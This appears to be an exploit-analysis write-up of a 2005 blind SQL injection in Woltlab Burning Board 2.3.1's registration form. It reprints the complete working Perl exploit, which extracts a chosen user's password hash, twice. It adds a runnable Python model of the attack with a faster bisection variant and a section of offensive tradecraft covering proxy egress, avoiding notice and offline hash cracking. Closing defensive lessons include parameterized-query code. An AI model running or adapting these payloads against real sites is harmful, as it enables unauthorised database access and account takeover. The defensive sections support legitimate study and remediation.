Exploiting Woltlab Burning Board 2.3.1 Registration SQL Injection

What this paper is
This paper details a SQL injection vulnerability in the register.php script of Woltlab Burning Board version 2.3.1 and earlier (reported by GulfTech Security Research; the exploit analysed here was written by deluxe89 and published on milw0rm on 2005-05-20). The flaw lets an unauthenticated attacker extract data from the database, specifically the stored password hash of a chosen user, by manipulating the e-mail address field of the registration form.
Simple technical breakdown
When register.php processes a new registration it builds an SQL query around the submitted e-mail address without escaping it. A single quote in the address terminates the string literal, and whatever follows is parsed and executed as SQL, so the attacker can append a condition of their own to the query.
The exploit is a boolean-based blind SQL injection. The server never returns query output or a database error; instead the script infers one bit per request from an application-level validation message (the "e-mail address not permitted" / "already taken" error) that appears only when the injected condition is true.
The hash is recovered one character at a time. For each of the 32 positions the script first asks whether the character's ASCII value is greater than 96 (which separates a-f from 0-9 in a hexadecimal digest), then tries the six letters or the ten digits one by one until an equality probe triggers the error message.
Complete code and payload walkthrough
The Perl script below (annotated copy of the original; the banner text is omitted here and appears in the verbatim listing at the end of this page) automates the extraction.
```perl
#!/usr/bin/perl
use strict;
use IO::Socket::INET;
# ... (banner output; see the verbatim listing below) ...
my $host = 'www.security-project.org';        # target host
my $path = '/wbb2/';                          # path to the Woltlab Burning Board installation
my $userid = 1;                               # user ID whose password hash is extracted
my $username = 'deluxe89';                    # an existing username on the board
my $proxy = '';                               # optional proxy as host:port; empty for a direct connection
my $error = 'E-Mail-Adresse ist unzulässig';  # oracle string, German for "e-mail address is not permitted";
                                              # the original notes 'email address entered is already ta' for English boards
# Proxy handling: connect to the proxy if one is set, otherwise straight to the host on port 80.
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
#
# Get the hash
#
print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
my $hash = '';   # declared but never used; recovered characters are printed as they are found
for(my $i=1;$i<33;$i++)   # one iteration per character of the 32-character hex digest
{
    # This socket is opened but never used; test() opens its own connection for every request.
    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
    if(&test($i, 96))   # third argument omitted, so the probe is ascii(...) > 96: true for a-f (97-102), false for 0-9 (48-57)
    {
        for(my $c=97;$c<103;$c++)   # 'a' (97) to 'f' (102): the only letters that occur in a hex digest, so the range is complete
        {
            if(&test($i, $c, 1))    # equality probe: is the character at position $i exactly chr($c)?
            {
                print pack('c', $c);  # print the recovered character
                last;                 # next position
            }
        }
    }
    else   # not a letter, so it must be a digit
    {
        #print "0-4\n";   # leftover debug output
        for(my $c=48;$c<58;$c++)   # '0' (48) to '9' (57)
        {
            if(&test($i, $c, 1))
            {
                print pack('c', $c);
                last;
            }
        }
    }
}
print "\n";
# test() sends one registration attempt carrying the injected condition and
# returns 1 if the oracle string appears in the response, 0 otherwise.
sub test
{
    my ($i, $num, $g) = @_;   # $i: 1-based character position, $num: ASCII value, $g: true for '=', false/undef for '>'
    my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
    # The injected e-mail value: a dummy address, a single quote that closes the application's
    # string literal, OR plus the attacker's condition on one character of the target user's
    # password column, and /* to comment out the remainder of the original query.
    my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
    $value .= ($g) ? '=' : '>';   # '=' for the final guess, '>' for the letter/digit split
    $value .= "$num)/*";
    # Complete registration form. $value is not URL-encoded: the quote, spaces and parentheses
    # travel raw; this works only because the payload contains no '&' and PHP splits each
    # name=value pair on the first '=' only.
    my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
    # Raw HTTP/1.1 request with an absolute URI in the request line, so the same bytes work through a proxy.
    print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
    # Read the response line by line; the oracle string must therefore appear within one line.
    while(<$sock>)
    {
        if($_ =~ m/$error/) { return 1; }   # oracle string present: the injected condition was true
    }
    return 0;   # never seen: the condition was false
}
# milw0rm.com [2005-05-20]
```
Code Fragment/Block -> Practical Purpose Mapping:
- `#!/usr/bin/perl`: shebang; the script runs under the Perl interpreter.
- `use strict;`: enforces variable declarations and catches common mistakes at compile time.
- `use IO::Socket::INET;`: the socket module used to hand-build the HTTP requests.
- `$| = print "...\n";`: prints the banner; print returns 1, and assigning that to `$|` turns on autoflush so progress output appears immediately.
- `my $host = '...';`: target hostname.
- `my $path = '...';`: directory of the board installation; register.php is requested relative to it.
- `my $userid = 1;`: user ID whose hash is targeted; it is interpolated into the injected condition.
- `my $username = '...';`: an existing username on the board, sent as r_username.
- `my $proxy = '';`: optional host:port proxy; when set, all requests are routed through it.
- `my $error = '...';`: the response string that signals a true condition: the oracle of the blind injection.
- `my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);`: connect to the proxy if one is set, otherwise to the target on port 80.
- `for(my $i=1;$i<33;$i++) { ... }`: outer loop over the 32 positions of the hexadecimal digest.
- `my $sock = new IO::Socket::INET(...);`: opens a TCP connection per iteration; this one is never used, because test() opens its own.
- `if(&test($i, 96)) { ... } else { ... }`: the `> 96` probe: true for a-f (ASCII 97-102), false for 0-9 (ASCII 48-57).
- `for(my $c=97;$c<103;$c++) { ... }`: inner loop over 'a'..'f'. Because the hash is hexadecimal, these six letters are the only ones that can occur; the range is complete, not truncated.
- `for(my $c=48;$c<58;$c++) { ... }`: inner loop over '0'..'9'.
- `if(&test($i, $c, 1)) { ... }`: equality probe for position `$i` and ASCII value `$c`; the third argument selects the '=' operator.
- `print pack('c', $c);`: prints the recovered character.
- `last;`: leaves the inner loop once a character matches.
- `sub test { ... }`: builds and sends one malicious registration request.
- `my ($i, $num, $g) = @_;`: position, ASCII value to compare against, and the comparison flag (true for '=', false or absent for '>').
- `my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";`: start of the injected e-mail value: a dummy address, a quote that closes the application's string literal, and a condition on one character of the target user's `password` column.
- `$value .= ($g) ? '=' : '>';`: appends the comparison operator. The script uses '>' only for the letter/digit split and '=' for the final guess; it does not bisect.
- `$value .= "$num)/*";`: the value to compare against, the closing parenthesis, and `/*`, which comments out the remainder of the original query.
- `my $data = "...";`: the complete registration form body; r_email carries the payload without URL-encoding.
- `print $sock "POST ...";`: sends the raw HTTP/1.1 request (absolute URI, so it also works via a proxy).
- `while(<$sock>) { if($_ =~ m/$error/) { return 1; } }`: reads the response line by line and returns 1 as soon as the oracle string is seen.
- `return 0;`: the oracle string never appeared, so the condition was false.
Shellcode/Payload Segments:
There is no machine-code shellcode here. The "payload" is the SQL fragment carried in the r_email parameter.
- Stage 1: SQL injection payload construction
  - Purpose: inject an attacker-controlled condition into the query that register.php runs on the submitted e-mail address.
  - Mechanism: the script builds a value such as
    sre4sdffr@4g54asd5.org' OR (userid=1 AND ascii(substring(password,1,1)) > 96)/*
  - Explanation:
    - `sre4sdffr@4g54asd5.org`: a dummy address that matches no existing user.
    - `'`: closes the string literal the application put around the e-mail value.
    - `OR`: makes the WHERE clause true whenever the injected condition is true.
    - `userid=1`: restricts the condition to the target user.
    - `ascii(substring(password,1,1))`: the ASCII value of the first character of that user's `password` column (the stored hash, not a cleartext password).
    - `> 96`: true for a-f, false for 0-9; the script then tests the letters or the digits by equality.
    - `)/*`: closes the parenthesis and opens a MySQL comment that swallows the rest of the original query, including the application's own closing quote, so the statement stays syntactically valid.
- Stage 2: the blind-injection oracle
  - Purpose: learn whether the injected condition was true or false.
  - Mechanism: the script searches the HTTP response for `$error` (`E-Mail-Adresse ist unzulässig`).
  - Explanation: the English equivalent given in the original, "email address entered is already ta[ken]", shows which query is being hijacked: register.php looks the submitted address up to reject duplicates. When the injected condition is true the WHERE clause matches the target user's row, the lookup returns a hit, and the board rejects the address as already in use. When it is false nothing matches and that message is absent. The script passes an existing username, presumably so that every attempt is rejected anyway and no accounts are created; only the presence of the e-mail error varies between requests.
- Stage 3: character recovery
  - Purpose: reconstruct the hash one character at a time.
  - Mechanism: for each position `$i` from 1 to 32, one '>' probe decides letter or digit, then equality probes walk through 97..102 ('a'..'f') or 48..57 ('0'..'9').
  - Explanation: if `test($i, $c, 1)` returns true, `chr($c)` is the character at position `$i`; it is printed and the loop moves to the next position. The script assumes a 32-character lowercase hexadecimal digest (MD5, as WBB2 stored passwords), for which the alphabet {0-9, a-f} is complete: the worst case is 11 requests per position, about 350 for a full hash. A binary search over the 16 candidates would need a fixed 4 requests per position instead.
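The three stages above, together with the summary in "Simple technical breakdown", as a runnable model. This is an added example, not code from the original exploit or from Woltlab: it uses an in-memory SQLite table in place of the board's users table, emulates MySQL's ascii() and substring() so the exploit's exact r_email payload runs unchanged, and models register.php's duplicate-e-mail check as a string-concatenated query (an assumption about the vulnerable code, inferred from the English oracle string "email address entered is already ta[ken]"). It reproduces the script's letter/digit split and linear scan, and goes beyond the page with a bisection over the 16 hex characters that needs a fixed four probes per position. The users, e-mail addresses and hashes are constructed sample data.

```python
import sqlite3

ERROR = "E-Mail-Adresse ist unzulässig"   # the oracle string from the exploit
HEX = "0123456789abcdef"                  # sorted by ASCII value: digits 48-57, letters 97-102

# Constructed sample rows (hashes are md5("password") and md5("test")).
SAMPLE_USERS = [
    (1, "admin", "admin@example.invalid", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "deluxe89", "deluxe89@example.invalid", "098f6bcd4621d373cade4e832627b4f6"),
]


def make_db():
    """In-memory stand-in for the board's users table."""
    conn = sqlite3.connect(":memory:")
    # Emulate the MySQL functions the payload relies on (1-based positions, as in MySQL).
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.execute("CREATE TABLE users (userid INTEGER, username TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def register_vulnerable(conn, email):
    """Model of the flawed duplicate-e-mail check: the submitted address is
    spliced into the SQL text, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT COUNT(*) FROM users WHERE email='" + email + "'"
    (hits,) = conn.execute(sql).fetchone()
    return ERROR if hits else "ok"


def payload(userid, pos, num, equal=False):
    """Exactly the r_email value the Perl test() builds."""
    op = "=" if equal else ">"
    return (f"sre4sdffr@4g54asd5.org' OR (userid={userid} "
            f"AND ascii(substring(password,{pos},1)){op}{num})/*")


def oracle(conn, userid, pos, num, equal=False):
    """True when the board's response carries the oracle string."""
    return ERROR in register_vulnerable(conn, payload(userid, pos, num, equal))


def extract_hash_linear(conn, userid, length=32):
    """The exploit's strategy: one '>96' probe splits a-f from 0-9, then a
    linear scan over the six letters or the ten digits. Returns (hash, probes)."""
    out, probes = [], 0
    for pos in range(1, length + 1):
        probes += 1
        candidates = range(97, 103) if oracle(conn, userid, pos, 96) else range(48, 58)
        for c in candidates:
            probes += 1
            if oracle(conn, userid, pos, c, equal=True):
                out.append(chr(c))
                break
        else:
            out.append("?")   # no candidate matched: the stored value is not lowercase hex
    return "".join(out), probes


def extract_hash_bisect(conn, userid, length=32):
    """Same oracle, but bisecting the 16-character hex alphabet with '>' probes:
    exactly four requests per position instead of up to eleven."""
    out, probes = [], 0
    for pos in range(1, length + 1):
        lo, hi = 0, len(HEX)          # candidate indexes in [lo, hi)
        while hi - lo > 1:
            mid = (lo + hi) // 2
            probes += 1
            # "char > HEX[mid-1]" holds exactly when the char's index is >= mid
            if oracle(conn, userid, pos, ord(HEX[mid - 1])):
                lo = mid
            else:
                hi = mid
        out.append(HEX[lo])
    return "".join(out), probes


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("linear (as in the exploit)", extract_hash_linear),
                     ("bisection", extract_hash_bisect)):
        digest, n = fn(db, 1)
        print(f"{name}: {digest} after {n} registration attempts")
```

The bisection is only valid because the alphabet is known and sorted by ASCII value; against a column with unknown content the usual approach is to bisect the full 0-255 range at eight probes per character.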
Practical details for offensive operations teams
- Required access level: network reachability to the target web server. The registration form is pre-authentication, so no account on the board is needed.
- Lab preconditions:
  - Perl with IO::Socket::INET (a core module).
  - A Woltlab Burning Board 2.3.1 (or earlier) instance reachable over the network.
  - The host, the installation path (`$path`) and the user ID (`$userid`) whose hash is wanted; the script defaults to 1, typically the account created at installation.
  - The oracle string for the board's language. The script ships the German string; the original comment gives 'email address entered is already ta' for English boards (a prefix of the full message, matched as a regex substring).
- Tooling assumptions:
  - A Perl interpreter.
  - Nmap or similar to locate the host and port.
  - A browser or intercepting proxy (e.g., Burp Suite) to confirm the board version and capture a genuine registration POST, since the form field names in `$data` must match the target.
- Execution pitfalls:
  - Wrong `$path` or `$userid`: the request hits the wrong script, or the condition never matches a row, so every probe reads as false.
  - Wrong `$error`: the script only ever sees true or false through this string. If the board is in another language, has customised templates, or serves its response in a charset different from the script file's encoding (the German string contains a non-ASCII character), no probe ever matches and the output is an empty hash. Response lines are matched one at a time, so the string must also appear within a single line.
  - Character set: the loops cover exactly 0-9 and a-f, which is complete for a 32-character lowercase hexadecimal digest. A board storing something else (uppercase hex, another length, a salted or non-MD5 scheme) yields gaps or an empty result and needs the loops adjusted.
  - Payload encoding: r_email is sent without URL-encoding. It works because the value contains no '&' and PHP splits each pair on the first '='; anything that normalises the body differently on the way (a proxy, a WAF) can break it.
  - WAF or database hardening: a modern WAF matches `' OR`, `ascii(substring(` and `/*` trivially.
  - Rate limiting or IP blocking: a full run is a few hundred registration POSTs from one address within a few minutes.
  - Timeouts: the 8-second socket timeout aborts the whole run (`die`) on a slow or flaky connection; there is no retry, so a partial hash must be re-collected from the start.
- Tradecraft considerations:
  - Reconnaissance: confirm the version, path and language before running, and choose the `$userid`.
  - Noise: every probe is a failed registration attempt that lands in the web server and application logs. Use the `$proxy` option or another egress if the origin address matters.
  - Error handling: add retries and a sanity check on the output length rather than trusting a partial hash.
  - Output analysis: a hash shorter than 32 characters, or one containing no letters at all, usually means the oracle string never matched.
  - Post-exploitation: the result is a hash, not a password; crack it offline with Hashcat or John the Ripper (unsalted MD5 cracks quickly).
Where this was used and when
- Context: the vulnerability was reported by GulfTech Security Research in 2005 and affects Woltlab Burning Board, a widely deployed PHP forum, up to version 2.3.1. The exploit analysed here was written by deluxe89.
- Usage: exploits of this kind were used by researchers and by attackers to obtain password hashes from forums, crack them offline, and log in as the recovered users (including administrators), which in turn enabled defacement, data theft or a foothold on the server.
- Approximate years/dates: published on milw0rm on May 20, 2005. Unescaped-input SQL injection was endemic in PHP web applications of the early to mid-2000s, before prepared statements became the default database interface and before WAFs were common.
Defensive lessons for modern teams
- Input validation and query construction: this is the crucial lesson. User-supplied data must never be concatenated into SQL text.
  - Parameterized queries/prepared statements: use them exclusively for database access. The value is bound separately from the statement, so a quote in an e-mail address can only ever be compared as a string.
  - Allow-listing: accept only known-good formats for structured fields such as e-mail addresses and usernames, and reject the rest before the database is involved.
  - Deny-listing (with caution): blocking known characters or patterns is a weak secondary measure and is easily bypassed; it does not replace parameterization.
- Web application firewalls: a properly configured WAF blocks the obvious patterns this exploit uses (`' OR`, `ascii(substring(`, `/*`). Keep rule sets current, and treat the WAF as defence in depth, not as the fix.
- Regular patching and updates: keep applications, frameworks and server software current; here that means moving beyond the affected versions (2.3.1 and earlier).
- Least privilege: give the application's database account only the rights it needs. Note that it would not have stopped this particular attack, because the abused query legitimately reads the users table; it limits the damage an injection can do elsewhere (other databases, FILE privileges, writes).
- Error handling: show users generic messages and log details server-side. Note that this exploit does not need a database error at all; its oracle is a normal validation message, which is why removing verbose errors alone does not close boolean-based blind injection.
- Secure coding practices: train developers on injection and its prevention, and make parameterized access the only code path available.
- Security audits and code reviews: review and test application code for injection regularly; an unescaped value in a WHERE clause is easy to find by grep or static analysis once you look.
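The first two lessons (parameterized queries and allow-listing), as an added example that is not code from Woltlab or from the original page. It models the duplicate-e-mail check that the advisory's payload abuses, in Python with an in-memory SQLite table of constructed sample users, and shows both layers against the exploit's exact r_email value: the allow-list rejects it before any query runs, and the bound parameter makes the database compare it as a string literal. The regex is deliberately strict rather than RFC-complete, an assumption made for the example.

```python
import re
import sqlite3

# Constructed sample data for the demonstration.
SAMPLE_USERS = [
    (1, "admin", "admin@example.invalid"),
    (2, "deluxe89", "deluxe89@example.invalid"),
]

# The exploit's r_email value for its first probe (position 1, "is it a letter?").
PAYLOAD = "sre4sdffr@4g54asd5.org' OR (userid=1 AND ascii(substring(password,1,1))>96)/*"

# Allow-list: local part, '@', dotted domain, nothing else. A quote, space or
# parenthesis never reaches the database. Strict rather than RFC-complete.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def is_valid_email(value):
    """Layer 1: reject anything that is not shaped like an address."""
    return len(value) <= 254 and EMAIL_RE.fullmatch(value) is not None


def make_db():
    """In-memory stand-in for the board's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def email_taken(conn, email):
    """Layer 2: the duplicate check with the value bound as a parameter. The
    statement text never changes, so the database only compares a string."""
    (hits,) = conn.execute("SELECT COUNT(*) FROM users WHERE email = ?", (email,)).fetchone()
    return hits > 0


def register(conn, email):
    """register.php-style flow: validate first, then ask the database."""
    if not is_valid_email(email):
        return "rejected: malformed e-mail address"
    if email_taken(conn, email):
        return "rejected: e-mail address already in use"
    return "ok"


if __name__ == "__main__":
    db = make_db()
    print("payload through the form:", register(db, PAYLOAD))
    print("payload straight to the bound query:", email_taken(db, PAYLOAD))
    # Plant a row whose e-mail *is* the payload string: the bound query now finds
    # exactly that row, which shows it was only ever treated as data.
    db.execute("INSERT INTO users VALUES (?, ?, ?)", (3, "literal", PAYLOAD))
    print("after planting the literal:", email_taken(db, PAYLOAD))
```

Both layers matter: validation keeps junk out of the data and the logs, but only the bound parameter removes the injection, so a field that must accept quotes (a signature, a display name) is still safe when queried this way.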
ASCII visual (if applicable)
The exploit is a network-level attack on a web application; one probe looks like this, and the script repeats it a few hundred times.
+-----------------+        +----------------------+        +--------------------------+
| Attacker's      |------->| Target Web Server    |------->| Woltlab Burning Board    |
| Machine (Perl)  |        | (e.g., Apache/Nginx) |        | (register.php)           |
+--------+--------+        +----------+-----------+        +------------+-------------+
         |                            |                                 |
         | 1. Craft malicious         |                                 | 3. Process request:
         |    HTTP POST request       |                                 |    e-mail value spliced
         |    (SQL in e-mail field)   |                                 |    into the SQL query
         |                            |                                 |    (SQL injection occurs)
         | 2. Send request ---------->|-------------------------------->|
         |                            |                                 |
         |<---------------------------|<--------------------------------| 4. Response with or
         | 5. Check response for      |                                 |    without the error
         |    the error string,       |                                 |    string (the oracle)
         |    then next probe         |                                 |
---
## Original Exploit-DB Content (Verbatim)
```text
#!/usr/bin/perl
use strict;
use IO::Socket::INET;
$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";
my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards
# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}
#
# Get the hash
#
print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";
sub test
{
my ($i, $num, $g) = @_;
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}
# milw0rm.com [2005-05-20]